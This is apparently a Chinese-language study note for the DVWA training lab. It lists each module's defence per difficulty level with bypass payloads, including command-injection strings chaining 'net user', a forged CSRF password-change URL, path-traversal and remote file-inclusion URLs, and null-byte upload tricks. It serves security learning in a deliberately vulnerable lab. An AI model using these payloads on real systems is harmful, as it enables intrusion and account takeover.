大伙直接看MD吧,payload有的被过滤了
反射型XSS
Low
防御:无
Payload:
Medium
防御:黑名单
Payload:
双写绕过
<sc
大小写混淆绕过
High
防御:黑名单,正则
Payload:
黑名单绕过
Impossible
防御:HTML 实体
Payload:无
存储型XSS
同反射型XSS
SQL Injection
Low
防御:无
Payload:
联合查询
Medium
防御:转义
Payload:
是数字型,所以同上
High
防御:转义 + LIMIT 1
Payload:
是数字型,所以同上,用#注释LIMIT 1
Impossible
防御:PDO
Payload:
无
SQL Injection(Blind)
思想和SQL Injection一样
Brute Force
Low
防御:无
Payload:
1.burp 爆破
2.sql注入
Medium
防御:防止了sql注入
Payload:
burp 爆破
High
防御:Token
Payload:
python脚本
or
burp https://blog.csdn.net/Z_Grant/article/details/100177201
Impossible
防御:错误次数限制 ,PDO
Payload:无
Command Injection
Low
防御:无
Payload:
127.0.0.1&&net user
Medium
防御:ban ”&&” 、”;”
Payload:
127.0.0.1&net user
High
防御:进一步完善了黑名单
Payload:
127.0.0.1|net user
Impossible
防御:is_numeric(string)
检测string是否为数字或数字字符串,如果是返回TRUE,否则返回FALSE。
Payload:无
CSRF
Low
防御:无
Payload:
dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#
Medium
防御:REFERER头
Payload:
burp改
High
防御:token
Payload:
XSS + CSRF
Impossible
防御:要求用户输入原始密码(狠)
Payload:
无
Insecure CAPTCHA
Low
防御:无
Payload:
更改step参数
Medium
防御:passed_captcha参数检查
Payload:
更改step参数,增加passed_captcha参数
High
防御:验证$resp
Payload:
更改参数recaptcha_response_field以及http包头的User-Agent
Impossible
防御:增加了Anti-CSRF token 验证码无法绕过 要求用户输入之前的密码
Payload:无
File Upload
Low
防御:无
Payload:
懂得都懂
Medium
防御:上传文件的类型、大小做了限制
Payload:
抓包修改文件类型
or
00阶段
High
防御:白名单
Payload:
%00截断
Impossible
防御:对上传文件进行了重命名(为md5值,导致%00截断无法绕过过滤规则)
Payload:
无
File Inclusion
Low
防御:无
Payload:
\dvwa\php.ini
Medium
防御:增加了str_replace函数,对page参数进行了一定的处理,将”http:// ”、”https://”、 ” ../”、”..\”替换为空字符,即删除
Payload:
/dvwa/vulnerabilities/fi/page=..././..././..././..././..././..././..././..././..././..././xampp/htdocs/dvwa/php.ini
dvwa/vulnerabilities/fi/page=htthttp://p://192.168.5.12/phpinfo.txt(远程文件包含)
High
防御:规定只能包含file开头的文件
Payload:
dvwa/vulnerabilities/fi/page=file:///C:/xampp/htdocs/dvwa/php.ini
Impossible
防御:白名单机制
Payload:无